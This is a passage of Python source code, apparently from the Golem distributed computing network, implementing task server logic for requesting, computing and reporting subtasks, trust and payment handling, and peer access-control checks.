key_id=%r, task_id=%r\",\r\n theader.task_owner.key,\r\n theader.task_id,\r\n )\r\n return None\r\n\r\n market_strategy = self.task_manager\\\r\n .get_provider_market_strategy_for_env(theader.environment)\r\n\r\n price = market_strategy.calculate_price(\r\n ProviderPricing(\r\n price_per_wallclock_h=self.config_desc.min_price,\r\n price_per_cpu_h=self.config_desc.price_per_cpu_h,\r\n ), theader.max_price, theader.task_owner.key)\r\n\r\n wtct = message.tasks.WantToComputeTask(\r\n perf_index=benchmark_score,\r\n cpu_usage=benchmark_cpu_usage,\r\n price=price,\r\n max_resource_size=self.config_desc.max_resource_size,\r\n max_memory_size=self.config_desc.max_memory_size,\r\n num_subtasks=num_subtasks,\r\n concent_enabled=self.client.concent_service.enabled\r\n if theader.concent_enabled else False,\r\n\r\n provider_public_key=self.keys_auth.key_id,\r\n provider_ethereum_address=self.keys_auth.eth_addr,\r\n task_header=theader,\r\n )\r\n\r\n task_class = self.client.apps_manager.get_task_class_for_env(\r\n theader.environment)\r\n budget = task_class.PROVIDER_MARKET_STRATEGY.calculate_budget(wtct)\r\n self.task_manager.add_comp_task_request(\r\n task_header=theader,\r\n budget=budget,\r\n performance=benchmark_score,\r\n num_subtasks=num_subtasks,\r\n )\r\n msg_queue.put(\r\n node_id=theader.task_owner.key,\r\n msg=wtct,\r\n timeout=datetime.timedelta(\r\n seconds=deadline_to_timeout(theader.deadline))\r\n )\r\n\r\n timer.ProviderTTCDelayTimers.start(wtct.task_id)\r\n self.requested_tasks.add(theader.task_id)\r\n return theader.task_id\r\n except Exception as err: # pylint: disable=broad-except\r\n logger.warning(\"Cannot send request for task: %s\", err)\r\n logger.warning(\"Detailed traceback\", exc_info=True)\r\n self.remove_task_header(theader.task_id)\r\n\r\n return None\r\n\r\n def task_given(\r\n self,\r\n msg: message.tasks.TaskToCompute,\r\n ) -> bool:\r\n if not self.task_manager.comp_task_keeper.receive_subtask(msg):\r\n return False\r\n\r\n if not self.task_computer.can_take_work():\r\n logger.error(\"Trying to assign a task, when it's already assigned\")\r\n return False\r\n\r\n task_header: dt_tasks.TaskHeader = msg.want_to_compute_task.task_header\r\n\r\n cpu_time_limit = None\r\n task_class = self.task_manager.apps_manager.get_task_class_for_env(\r\n task_header.environment)\r\n if task_class.PROVIDER_MARKET_STRATEGY.SET_CPU_TIME_LIMIT:\r\n cpu_time_limit = task_helpers.calculate_max_usage(\r\n task_header.subtask_budget, msg.want_to_compute_task.price)\r\n\r\n self.task_computer.task_given(msg.compute_task_def, cpu_time_limit)\r\n\r\n resource_downloaded = functools.partial(\r\n self._resource_downloaded,\r\n msg.subtask_id,\r\n msg.requestor_id,\r\n msg.price)\r\n\r\n if task_header.environment_prerequisites:\r\n subtask_inputs_dir = self.task_computer.get_subtask_inputs_dir()\r\n resources_options = msg.resources_options or dict(options={})\r\n client_options = self.resource_manager.build_client_options(\r\n **resources_options.get('options', {}))\r\n\r\n deferred_list = [\r\n self.new_resource_manager.download(\r\n resource_id,\r\n subtask_inputs_dir,\r\n client_options,\r\n ) for resource_id in msg.compute_task_def['resources']\r\n ]\r\n\r\n defer.gatherResults(\r\n deferred_list,\r\n consumeErrors=True,\r\n ).addCallback(\r\n lambda _: resource_downloaded()\r\n ).addCallbacks(\r\n lambda _: self.resource_collected(msg.task_id, msg.subtask_id),\r\n lambda e: self.resource_failure(msg.task_id, e))\r\n else:\r\n self.request_resource(\r\n msg.task_id,\r\n msg.subtask_id,\r\n 
msg.compute_task_def['resources'],\r\n msg.resources_options,\r\n )\r\n resource_downloaded()\r\n\r\n return True\r\n\r\n def _resource_downloaded(\r\n self,\r\n subtask_id: str,\r\n requestor_id: str,\r\n price: int,\r\n ) -> None:\r\n logger.debug(\"requested_tasks cleared\")\r\n self.requested_tasks.clear()\r\n update_requestor_assigned_sum(requestor_id, price)\r\n dispatcher.send(\r\n signal='golem.subtask',\r\n event='started',\r\n subtask_id=subtask_id,\r\n price=price,\r\n )\r\n\r\n def resource_collected(\r\n self,\r\n task_id: str,\r\n subtask_id: Optional[str] = None\r\n ) -> bool:\r\n return self.task_computer.start_computation(task_id, subtask_id)\r\n\r\n def resource_failure(self, task_id: str, reason: str) -> None:\r\n if task_id not in self.task_computer.assigned_task_ids:\r\n logger.error(\"Resource failure for a wrong task, %s\", task_id)\r\n return\r\n\r\n subtask_id = self.task_computer.assigned_subtask_id\r\n self.task_computer.task_interrupted(task_id)\r\n if subtask_id is not None:\r\n self.send_task_failed(\r\n subtask_id, task_id, f'Error downloading resources: {reason}')\r\n else:\r\n logger.error(\"Missing subtask info for task failure %s\", task_id)\r\n\r\n def send_results(\r\n self,\r\n subtask_id: str,\r\n task_id: str,\r\n result: Optional[List[Path]] = None,\r\n task_api_result: Optional[Path] = None,\r\n stats: Optional[Dict] = None,\r\n ) -> None:\r\n if not result and not task_api_result:\r\n raise ValueError('No results to send')\r\n\r\n if subtask_id in self.results_to_send:\r\n raise RuntimeError(\"Incorrect subtask_id: {}\".format(subtask_id))\r\n\r\n # this is purely for tests\r\n if self.config_desc.overwrite_results and result is not None:\r\n for file_path in result:\r\n shutil.copyfile(\r\n src=self.config_desc.overwrite_results,\r\n dst=file_path)\r\n\r\n header = self.task_keeper.task_headers[task_id]\r\n\r\n delay_time = 0.0\r\n last_sending_trial = 0\r\n stats = stats or {}\r\n if result is None:\r\n task_result: Tuple = (str(task_api_result),)\r\n else:\r\n task_result = tuple(result)\r\n\r\n wtr = WaitingTaskResult(\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n result=task_result,\r\n last_sending_trial=last_sending_trial,\r\n delay_time=delay_time,\r\n owner=header.task_owner,\r\n stats=stats)\r\n\r\n def enqueue_computed_task_result():\r\n self.results_to_send[wtr.subtask_id] = wtr\r\n Trust.REQUESTED.increase(wtr.owner.key)\r\n\r\n if result:\r\n self._create_and_set_result_package(wtr)\r\n enqueue_computed_task_result()\r\n return\r\n\r\n def on_result_share_success(resource_id):\r\n wtr.package_sha1 = resource_id\r\n wtr.result_path = wtr.result[0]\r\n wtr.result_hash = resource_id\r\n enqueue_computed_task_result()\r\n\r\n def on_result_share_error(err):\r\n logger.error(\r\n \"Cannot share resources for subtask_id=%s: %r\",\r\n subtask_id, err)\r\n\r\n client_options = self.get_share_options(\r\n timeout=deadline_to_timeout(header.deadline))\r\n deferred = self.new_resource_manager.share(\r\n task_api_result,\r\n client_options)\r\n deferred.addCallbacks( # pylint: disable=no-member\r\n on_result_share_success, on_result_share_error)\r\n\r\n def _create_and_set_result_package(self, wtr):\r\n task_result_manager = self.task_manager.task_result_manager\r\n client_options = self.get_share_options(\r\n timeout=self.RESULT_SHARE_TIMEOUT)\r\n\r\n wtr.result_secret = task_result_manager.gen_secret()\r\n result = task_result_manager.create(\r\n wtr,\r\n client_options,\r\n wtr.result_secret)\r\n\r\n (\r\n wtr.result_hash,\r\n 
wtr.result_path,\r\n wtr.package_sha1,\r\n wtr.result_size,\r\n wtr.package_path,\r\n ) = result\r\n\r\n def send_task_failed(\r\n self,\r\n subtask_id: str,\r\n task_id: str,\r\n err_msg: str,\r\n reason=message.TaskFailure.DEFAULT_REASON,\r\n decrease_trust=True\r\n ) -> None:\r\n header = self.task_keeper.task_headers[task_id]\r\n\r\n if subtask_id not in self.failures_to_send:\r\n if decrease_trust:\r\n Trust.REQUESTED.decrease(header.task_owner.key)\r\n\r\n self.failures_to_send[subtask_id] = WaitingTaskFailure(\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n err_msg=err_msg,\r\n owner=header.task_owner,\r\n reason=reason)\r\n\r\n def new_connection(self, session):\r\n if not self.active:\r\n session.disconnect(message.base.Disconnect.REASON.NoMoreMessages)\r\n return\r\n logger.debug(\r\n 'Incoming TaskSession. address=%s:%d',\r\n session.address,\r\n session.port,\r\n )\r\n self.task_sessions_incoming.add(session)\r\n\r\n def disconnect(self):\r\n for node_id in list(self.sessions):\r\n try:\r\n task_session = self.sessions[node_id]\r\n if task_session is None:\r\n # Pending connection\r\n continue\r\n task_session.dropped()\r\n del self.sessions[node_id]\r\n except Exception as exc: # pylint: disable=broad-except\r\n logger.error(\"Error closing session: %s\", exc)\r\n\r\n def get_own_tasks_headers(self):\r\n old_headers = self.task_manager.get_tasks_headers()\r\n new_headers = self._get_and_sign_headers()\r\n return old_headers + new_headers\r\n\r\n def _get_and_sign_headers(self):\r\n started_tasks = self.requested_task_manager.get_started_tasks()\r\n signed_headers = []\r\n for db_task in started_tasks:\r\n # FIXME: store the value in RequestedTask\r\n # https://github.com/golemfactory/golem/pull/\r\n # 4926#discussion_r349627722\r\n subtask_budget = calculate_subtask_payment(\r\n db_task.max_price_per_hour,\r\n db_task.subtask_timeout\r\n )\r\n task_header = dt_tasks.TaskHeader(\r\n min_version=str(gconst.GOLEM_MIN_VERSION),\r\n task_id=db_task.task_id,\r\n environment=db_task.env_id,\r\n environment_prerequisites=db_task.prerequisites,\r\n task_owner=self.node,\r\n deadline=int(db_task.deadline.timestamp()),\r\n subtask_timeout=db_task.subtask_timeout,\r\n subtask_budget=subtask_budget,\r\n subtasks_count=db_task.max_subtasks,\r\n estimated_memory=db_task.min_memory,\r\n max_price=db_task.max_price_per_hour,\r\n concent_enabled=db_task.concent_enabled,\r\n timestamp=int(db_task.start_time.timestamp()),\r\n )\r\n task_header.sign(private_key=self.keys_auth._private_key)\r\n signed_headers.append(task_header)\r\n\r\n return signed_headers\r\n\r\n def get_others_tasks_headers(self) -> List[dt_tasks.TaskHeader]:\r\n return self.task_keeper.get_all_tasks()\r\n\r\n @inlineCallbacks\r\n def add_task_header(self, task_header: dt_tasks.TaskHeader):\r\n if not self._verify_header_sig(task_header):\r\n logger.info(\r\n 'Invalid signature. task_id=%r, signature=%r',\r\n task_header.task_id,\r\n task_header.signature,\r\n )\r\n return False\r\n if task_header.deadline < get_timestamp_utc():\r\n logger.info(\r\n \"Task's deadline already in the past. 
task_id=%r\",\r\n task_header.task_id\r\n )\r\n return False\r\n\r\n if task_header.environment_prerequisites:\r\n image_name = task_header.environment_prerequisites['image']\r\n self._docker_image_discovered(image_name)\r\n\r\n try:\r\n if self.task_manager.is_my_task(task_header.task_id) or \\\r\n task_header.task_owner.key == self.node.key:\r\n return True # Own tasks are not added to task keeper\r\n\r\n task_added = yield self.task_keeper.add_task_header(task_header)\r\n return task_added\r\n except Exception: # pylint: disable=broad-except\r\n logger.exception(\"Task header validation failed\")\r\n return False\r\n\r\n @classmethod\r\n def _verify_header_sig(cls, header: dt_tasks.TaskHeader):\r\n try:\r\n header.verify(public_key=decode_hex(header.task_owner.key))\r\n except msg_exceptions.CryptoError:\r\n logger.debug(\r\n 'hdr verification failed. hdr.task_owner.key: %r',\r\n header.task_owner.key,\r\n exc_info=True,\r\n )\r\n return False\r\n return True\r\n\r\n @rpc_utils.expose('comp.tasks.known.delete')\r\n def remove_task_header(self, task_id) -> bool:\r\n logger.debug(\"removing task header: task_id=%s\", task_id)\r\n self.requested_tasks.discard(task_id)\r\n return self.task_keeper.remove_task_header(task_id)\r\n\r\n def set_last_message(self, type_, t, msg, ip_addr, port):\r\n if len(self.last_messages) >= 5:\r\n self.last_messages = self.last_messages[-4:]\r\n\r\n self.last_messages.append([type_, t, ip_addr, port, msg])\r\n\r\n def _task_result_sent(self, subtask_id):\r\n return self.results_to_send.pop(subtask_id, None)\r\n\r\n @inlineCallbacks\r\n def change_config(\r\n self,\r\n config_desc: ClientConfigDescriptor,\r\n run_benchmarks: bool = False\r\n ) -> Deferred: # pylint: disable=arguments-differ\r\n\r\n PendingConnectionsServer.change_config(self, config_desc)\r\n yield self.task_keeper.change_config(config_desc)\r\n yield self._change_task_computer_config(config_desc, run_benchmarks)\r\n\r\n @inlineCallbacks\r\n def _change_task_computer_config(\r\n self,\r\n config_desc: ClientConfigDescriptor,\r\n run_benchmarks: bool,\r\n ) -> Deferred:\r\n config_changed = yield self.task_computer.change_config(config_desc)\r\n if config_changed:\r\n self._remove_env_performance_scores()\r\n self.app_benchmark_manager.remove_benchmark_scores()\r\n elif not run_benchmarks:\r\n return\r\n\r\n self.task_computer.lock_config(True)\r\n deferred = Deferred()\r\n self.benchmark_manager.run_all_benchmarks(\r\n deferred.callback, deferred.errback)\r\n yield deferred\r\n self.task_computer.lock_config(False)\r\n\r\n def _remove_env_performance_scores(self) -> None:\r\n env_manager = self.task_keeper.new_env_manager\r\n for env_id in env_manager.environments():\r\n env_manager.remove_cached_performance(env_id)\r\n\r\n def get_task_computer_root(self):\r\n return os.path.join(self.client.datadir, \"ComputerRes\")\r\n\r\n def get_app_dir(self) -> Path:\r\n \"\"\" Get path to the directory where definitions for Task API apps are\r\n stored. \"\"\"\r\n return Path(self.client.datadir) / \"apps\"\r\n\r\n def subtask_rejected(self, sender_node_id, subtask_id):\r\n \"\"\"My (providers) results were rejected\"\"\"\r\n logger.debug(\"Subtask %r result rejected\", subtask_id)\r\n self._task_result_sent(subtask_id)\r\n\r\n self._decrease_trust_payment(sender_node_id)\r\n # self.remove_task_header(task_id)\r\n # TODO Inform transaction system and task manager about rejected\r\n # subtask. 
Issue #2405\r\n\r\n # pylint:disable=too-many-arguments\r\n def subtask_accepted(\r\n self,\r\n sender_node_id: str,\r\n task_id: str,\r\n subtask_id: str,\r\n payer_address: str,\r\n value: int,\r\n accepted_ts: int):\r\n \"\"\"My (providers) results were accepted\"\"\"\r\n logger.debug(\"Subtask %r result accepted\", subtask_id)\r\n self._task_result_sent(subtask_id)\r\n self.client.transaction_system.expect_income(\r\n sender_node=sender_node_id,\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n payer_address=payer_address,\r\n value=value,\r\n accepted_ts=accepted_ts,\r\n )\r\n\r\n def subtask_settled(self, sender_node_id, subtask_id, settled_ts):\r\n \"\"\"My (provider's) results were accepted by the Concent\"\"\"\r\n logger.debug(\"Subtask %r settled by the Concent\", subtask_id)\r\n self._task_result_sent(subtask_id)\r\n self.client.transaction_system.settle_income(\r\n sender_node_id, subtask_id, settled_ts)\r\n\r\n def subtask_waiting(self, task_id, subtask_id=None):\r\n logger.debug(\r\n \"Requestor waits for subtask results.\"\r\n \" task_id=%(task_id)s subtask_id=%(subtask_id)s\",\r\n {\r\n 'task_id': task_id,\r\n 'subtask_id': subtask_id,\r\n },\r\n )\r\n # We can still try to request a subtask for this task next time.\r\n self.requested_tasks.discard(task_id)\r\n\r\n def subtask_failure(self, subtask_id, err):\r\n logger.info(\"Computation for task %r failed: %r.\", subtask_id, err)\r\n node_id = self.task_manager.get_node_id_for_subtask(subtask_id)\r\n Trust.COMPUTED.decrease(node_id)\r\n self.task_manager.task_computation_failure(subtask_id, err)\r\n\r\n def accept_result(self, task_id, subtask_id, key_id, eth_address: str,\r\n value: int, *, unlock_funds=True) -> TaskPayment:\r\n # FIXME: trust\r\n if self.requested_task_manager.task_exists(task_id):\r\n trust = 1.0\r\n else:\r\n trust = self.task_manager.get_trust_mod(subtask_id)\r\n mod = min(max(trust, self.min_trust), self.max_trust)\r\n Trust.COMPUTED.increase(key_id, mod)\r\n payment = self.client.transaction_system.add_payment_info(\r\n node_id=key_id,\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n value=value,\r\n eth_address=eth_address,\r\n )\r\n # task lock is removed before subtask, suppress warning in this case\r\n if unlock_funds and self.client.funds_locker.has_task(task_id):\r\n self.client.funds_locker.remove_subtask(task_id)\r\n logger.debug('Result accepted for subtask: %s Created payment ts: %r',\r\n subtask_id, payment)\r\n return payment\r\n\r\n def income_listener(self, event='default', node_id=None, **kwargs):\r\n if event == 'confirmed':\r\n self._increase_trust_payment(node_id, kwargs['amount'])\r\n elif event == 'overdue_single':\r\n self._decrease_trust_payment(node_id)\r\n\r\n def finished_subtask_listener(self, # pylint: disable=too-many-arguments\r\n event='default', subtask_id=None,\r\n min_performance=None, **_kwargs):\r\n\r\n if event != 'subtask_finished':\r\n return\r\n\r\n keeper = self.task_manager.comp_task_keeper\r\n\r\n try:\r\n task_id = keeper.get_task_id_for_subtask(subtask_id)\r\n header = keeper.get_task_header(task_id)\r\n performance = keeper.active_tasks[task_id].performance\r\n computation_time = timer.ProviderTimer.time\r\n node_id = keeper.get_node_for_task_id(task_id)\r\n\r\n if computation_time:\r\n logger.debug(\r\n \"updating requestor efficiency. 
\"\r\n \"node_id=%s, timeout=%s, computation_timer=%s, \"\r\n \"performance=%s, min_performance=%s\",\r\n node_id, header.subtask_timeout, computation_time,\r\n performance, min_performance\r\n )\r\n\r\n update_requestor_efficiency(\r\n node_id=node_id,\r\n timeout=header.subtask_timeout,\r\n computation_time=computation_time,\r\n performance=performance,\r\n min_performance=min_performance,\r\n )\r\n else:\r\n logger.debug(\r\n \"still computing, will update requestor efficiency later\"\r\n )\r\n\r\n except (KeyError, ValueError, AttributeError) as exc:\r\n logger.error(\"Finished subtask listener: %r\", exc)\r\n return\r\n\r\n def finished_task_listener(self, event='default', task_id=None, op=None,\r\n **_kwargs):\r\n if not (event == 'task_status_updated'\r\n and self.client.p2pservice):\r\n return\r\n if not (op in [TaskOp.FINISHED, TaskOp.TIMEOUT, TaskOp.ABORTED]):\r\n return\r\n self.client.p2pservice.remove_task(task_id)\r\n self.client.funds_locker.remove_task(task_id)\r\n if not self.requested_task_manager.has_unfinished_tasks():\r\n self.client.update_setting('accept_tasks', True, False)\r\n\r\n def _increase_trust_payment(self, node_id: str, amount: int):\r\n Trust.PAYMENT.increase(node_id, self.max_trust)\r\n update_requestor_paid_sum(node_id, amount)\r\n\r\n def _decrease_trust_payment(self, node_id: str):\r\n Trust.PAYMENT.decrease(node_id, self.max_trust)\r\n\r\n def reject_result(self, subtask_id, key_id):\r\n mod = min(\r\n max(self.task_manager.get_trust_mod(subtask_id), self.min_trust),\r\n self.max_trust)\r\n Trust.WRONG_COMPUTED.decrease(key_id, mod)\r\n\r\n def get_socket_addresses(self, node_info, prv_port=None, pub_port=None):\r\n \"\"\" Change node info into tcp addresses. Adds a suggested address.\r\n :param Node node_info: node information\r\n :param prv_port: private port that should be used\r\n :param pub_port: public port that should be used\r\n :return:\r\n \"\"\"\r\n prv_port = prv_port or node_info.prv_port\r\n pub_port = pub_port or node_info.pub_port\r\n\r\n socket_addresses = super().get_socket_addresses(\r\n node_info=node_info,\r\n prv_port=prv_port,\r\n pub_port=pub_port\r\n )\r\n\r\n address = self.client.get_suggested_addr(node_info.key)\r\n if not address:\r\n return socket_addresses\r\n\r\n if self._is_address_valid(address, prv_port):\r\n socket_address = SocketAddress(address, prv_port)\r\n self._prepend_address(socket_addresses, socket_address)\r\n\r\n if self._is_address_valid(address, pub_port):\r\n socket_address = SocketAddress(address, pub_port)\r\n self._prepend_address(socket_addresses, socket_address)\r\n\r\n return socket_addresses[:MAX_CONNECT_SOCKET_ADDRESSES]\r\n\r\n def add_forwarded_session_request(self, key_id, conn_id):\r\n self.forwarded_session_requests[key_id] = dict(\r\n conn_id=conn_id, time=time.time())\r\n\r\n def get_min_performance_for_env(self, env_id: str) -> float:\r\n env = self.get_environment_by_id(env_id)\r\n if isinstance(env, OldEnv):\r\n return env.get_min_accepted_performance()\r\n # NewEnv\r\n # TODO: Implement minimum performance in new env\r\n return 0.0\r\n\r\n class RejectedReason(Enum):\r\n not_my_task = 'not my task'\r\n performance = 'performance'\r\n disk_size = 'disk size'\r\n memory_size = 'memory size'\r\n acl = 'acl'\r\n trust = 'trust'\r\n netmask = 'netmask'\r\n not_accepted = 'not accepted'\r\n\r\n def should_accept_provider( # pylint: disable=too-many-return-statements\r\n self, node_id: str, ip_addr: str, task_id: str,\r\n provider_perf: float, max_memory_size: int,\r\n offer_hash: str) -> 
bool:\r\n\r\n # max_memory_size: int KiB\r\n max_memory_size_b = int(max_memory_size) * 1024 # Bytes\r\n\r\n node_name_id = short_node_id(node_id)\r\n ids = f'provider={node_name_id}, task_id={task_id}'\r\n\r\n if task_id in self.task_manager.tasks:\r\n task = self.task_manager.tasks[task_id]\r\n env_id = task.header.environment\r\n min_memory = task.header.estimated_memory\r\n mask = task.header.mask\r\n accept_client_verdict = task.should_accept_client(\r\n node_id,\r\n offer_hash)\r\n logger.debug(\r\n \"should_accept_client verdict: %s, task_id=%s\",\r\n accept_client_verdict,\r\n task_id,\r\n )\r\n elif self.requested_task_manager.task_exists(task_id):\r\n req_task = self.requested_task_manager.get_requested_task(task_id)\r\n assert req_task, \"Task missing due a race condition\"\r\n env_id = req_task.env_id\r\n min_memory = req_task.min_memory\r\n mask = Mask(req_task.mask)\r\n # For compatibility purposes; the app decides to whom assign a task\r\n accept_client_verdict = AcceptClientVerdict.ACCEPTED\r\n else:\r\n logger.info('Cannot find task in my tasks: %s', ids)\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.not_my_task)\r\n return False\r\n\r\n min_accepted_perf = self.get_min_performance_for_env(env_id)\r\n\r\n if min_accepted_perf > int(provider_perf):\r\n logger.info(f'insufficient provider performance: {provider_perf}'\r\n f' < {min_accepted_perf}; {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.performance,\r\n details={\r\n 'provider_perf': provider_perf,\r\n 'min_accepted_perf': min_accepted_perf,\r\n })\r\n return False\r\n\r\n if min_memory > max_memory_size_b:\r\n logger.info(\r\n 'insufficient provider memory size:'\r\n ' %(available)s < %(min_memory)s;'\r\n ' Free at least %(missing)s; %(ids)s',\r\n {\r\n 'min_memory': memoryhelper.dir_size_to_display(min_memory),\r\n 'available': memoryhelper.dir_size_to_display(\r\n max_memory_size_b,\r\n ),\r\n 'missing': memoryhelper.dir_size_to_display(\r\n min_memory - max_memory_size_b,\r\n ),\r\n 'ids': ids,\r\n }\r\n )\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.memory_size,\r\n details={\r\n 'memory_size': min_memory,\r\n 'max_memory_size': max_memory_size * 1024,\r\n })\r\n return False\r\n\r\n allowed, reason = self.acl.is_allowed(node_id)\r\n if allowed:\r\n allowed, reason = self.acl_ip.is_allowed(ip_addr)\r\n if not allowed:\r\n reason_msg = 'unknown reason' if reason is None else reason.value\r\n logger.info(f'provider is {reason_msg}; {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.acl,\r\n details={'acl_reason': reason_msg})\r\n return False\r\n\r\n trust = self.client.get_computing_trust(node_id)\r\n if trust < self.config_desc.computing_trust:\r\n logger.info(f'insufficient provider trust level: {trust} < '\r\n f'{self.config_desc.computing_trust}; {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.trust,\r\n details={\r\n 'trust': trust,\r\n 'required_trust': self.config_desc.computing_trust,\r\n })\r\n return False\r\n\r\n if not mask.matches(decode_hex(node_id)):\r\n logger.info(f'network mask mismatch: {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.netmask)\r\n return False\r\n\r\n if accept_client_verdict != AcceptClientVerdict.ACCEPTED:\r\n 
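            # Final acceptance gate: every earlier check (task ownership,\r
            # performance, memory, ACL, trust, netmask) has already passed\r
            # by the time the per-task client verdict is consulted here.\r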
logger.info(f'provider {node_id} is not allowed'\r\n f' for this task at this moment '\r\n f'(either waiting for results or previously failed)')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.not_accepted,\r\n details={\r\n 'verdict': accept_client_verdict.value,\r\n })\r\n return False\r\n\r\n logger.debug('provider can be accepted %s', ids)\r\n return True\r\n\r\n @classmethod\r\n def notify_provider_rejected(cls, node_id: str, task_id: str,\r\n reason: RejectedReason,\r\n details: Optional[Dict[str, Any]] = None):\r\n dispatcher.send(\r\n signal='golem.taskserver',\r\n event='provider_rejected',\r\n node_id=node_id,\r\n task_id=task_id,\r\n reason=reason.value,\r\n details=details,\r\n )\r\n\r\n def should_accept_requestor(self, node_id):\r\n allowed, reason = self.acl.is_allowed(node_id)\r\n if not allowed:\r\n short_id = short_node_id(node_id)\r\n logger.info('requestor is %s. node=%s', reason, short_id)\r\n return SupportStatus.err({UnsupportReason.DENY_LIST: node_id})\r\n trust = self.client.get_requesting_trust(node_id)\r\n logger.debug(\"Requesting trust level: %r\", trust)\r\n if trust >= self.config_desc.requesting_trust:\r\n return SupportStatus.ok()\r\n return SupportStatus.err({UnsupportReason.REQUESTOR_TRUST: trust})\r\n\r\n @rpc_utils.expose('net.peer.block')\r\n def disallow_node(\r\n self,\r\n node_id: Union[str, list],\r\n timeout_seconds: int = -1,\r\n ) -> Tuple[bool, List[str], Optional[str]]:\r\n '''\r\n return Tuple\r\n (is_disallow_success, list_of_already_disallowed_nodes, err_message)\r\n\r\n Success: (True, [], None)\r\n Success with existing node: (True, ['node_id'], None)\r\n Error: (False, [], 'message')\r\n '''\r\n not_changed: List[str] = []\r\n try:\r\n if isinstance(node_id, str):\r\n node_id = [node_id]\r\n for item in node_id:\r\n if not self.acl.disallow(item, timeout_seconds):\r\n not_changed.append(item)\r\n return True, not_changed, None\r\n except Exception as e: # pylint: disable=broad-except\r\n return False, not_changed, str(e)\r\n\r\n @rpc_utils.expose('net.peer.block_ip')\r\n def disallow_ip(self, ip: Union[str, list],\r\n timeout_seconds: int = -1) -> None:\r\n if isinstance(ip, str):\r\n ip = [ip]\r\n for item in ip:\r\n self.acl_ip.disallow(item, timeout_seconds)\r\n\r\n @rpc_utils.expose('net.peer.allow')\r\n def allow_node(\r\n self,\r\n node_id: Union[str, list],\r\n persist: bool = True\r\n ) -> Tuple[bool, List[str], Optional[str]]:\r\n '''\r\n return Tuple\r\n (is_allow_success, list_of_already_allowed_nodes, err_message)\r\n\r\n Success: (True, [], None)\r\n Success with existing node: (True, ['node_id'], None)\r\n Error: (False, [], 'message')\r\n '''\r\n not_changed: List[str] = []\r\n try:\r\n if isinstance(node_id, str):\r\n node_id = [node_id]\r\n for item in node_id:\r\n if not self.acl.allow(item, persist):\r\n not_changed.append(item)\r\n return True, not_changed, None\r\n except Exception as e: # pylint: disable=broad-except\r\n return False, not_changed, str(e)\r\n\r\n @rpc_utils.expose('net.peer.allow_ip')\r\n def allow_ip(self, ip: Union[str, list], persist: bool = True) -> None:\r\n if isinstance(ip, str):\r\n ip = [ip]\r\n for item in ip:\r\n self.acl_ip.allow(item, persist)\r\n\r\n @rpc_utils.expose('net.peer.acl')\r\n def acl_status(self) -> Dict:\r\n return self.acl.status().to_message()\r\n\r\n @rpc_utils.expose('net.peer.acl_ip')\r\n def acl_ip_status(self) -> Dict:\r\n return self.acl_ip.status().to_message()\r\n\r\n @rpc_utils.expose('net.peer.acl.new')\r\n 
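    # Illustrative only (not from the original source): an RPC client could\r
    # rebuild the ACL with a call along the lines of\r
    #   session.call('net.peer.acl.new', default_rule='allow', exceptions=[node_id])\r
    # where 'allow' is assumed to name a valid AclRule member; acl_setup()\r
    # resolves the string via AclRule[default_rule] and replaces self.acl\r
    # wholesale.\r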
def acl_setup(self, default_rule: str, exceptions: List[str]) -> None:\r\n new_acl = setup_acl(self.client,\r\n AclRule[default_rule],\r\n exceptions)\r\n self.acl = new_acl\r\n\r\n def _sync_forwarded_session_requests(self):\r\n now = time.time()\r\n for key_id, data in list(self.forwarded_session_requests.items()):\r\n if not data:\r\n del self.forwarded_session_requests[key_id]\r\n continue\r\n if now - data['time'] >= self.forwarded_session_request_timeout:\r\n logger.debug('connection timeout: %s', data)\r\n del self.forwarded_session_requests[key_id]\r\n self.final_conn_failure(data['conn_id'])\r\n\r\n def _listening_established(self, port: int) -> None:\r\n logger.debug('_listening_established(%r)', port)\r\n self.cur_port = port\r\n logger.info(\" Port {} opened - listening\".format(self.cur_port))\r\n self.node.prv_port = self.cur_port\r\n self.task_manager.node = self.node\r\n\r\n def _listening_failure(self, **kwargs):\r\n logger.error(\"Listening on ports {} to {} failure\".format(\r\n self.config_desc.start_port, self.config_desc.end_port))\r\n # FIXME: some graceful terminations should take place here. #1287\r\n # sys.exit(0)\r\n\r\n #############################\r\n # SYNC METHODS\r\n #############################\r\n def __remove_old_tasks(self):\r\n self.task_keeper.remove_old_tasks()\r\n self.task_manager.comp_task_keeper.remove_old_tasks()\r\n nodes_with_timeouts = self.task_manager.check_timeouts()\r\n for node_id in nodes_with_timeouts:\r\n Trust.COMPUTED.decrease(node_id)\r\n\r\n def _send_waiting_results(self):\r\n for subtask_id in list(self.results_to_send.keys()):\r\n wtr: WaitingTaskResult = self.results_to_send[subtask_id]\r\n now = time.time()\r\n\r\n if not wtr.already_sending:\r\n if now - wtr.last_sending_trial > wtr.delay_time:\r\n wtr.already_sending = True\r\n wtr.last_sending_trial = now\r\n helpers.send_report_computed_task(\r\n task_server=self,\r\n waiting_task_result=wtr,\r\n )\r\n\r\n for wtf in list(self.failures_to_send.values()):\r\n helpers.send_task_failure(\r\n waiting_task_failure=wtf,\r\n )\r\n self.failures_to_send.clear()\r\n\r\n # CONFIGURATION METHODS\r\n #############################\r\n @staticmethod\r\n def __get_task_manager_root(datadir):\r\n return os.path.join(datadir, \"ComputerRes\")\r\n\r\n\r\n@dataclass\r\nclass WaitingTaskResult:\r\n delay_time: float\r\n last_sending_trial: int\r\n owner: 'dt_p2p.Node'\r\n result: Tuple\r\n subtask_id: str\r\n task_id: str\r\n\r\n already_sending: bool = False\r\n package_path: Optional[str] = None\r\n package_sha1: Optional[str] = None\r\n result_hash: Optional[str] = None\r\n result_path: Optional[str] = None\r\n result_secret: Optional[str] = None\r\n result_sha1: Optional[str] = None\r\n result_size: int = 0\r\n stats: Dict = field(default_factory=dict)\r\n\r\n\r\n@dataclass\r\nclass WaitingTaskFailure:\r\n err_msg: 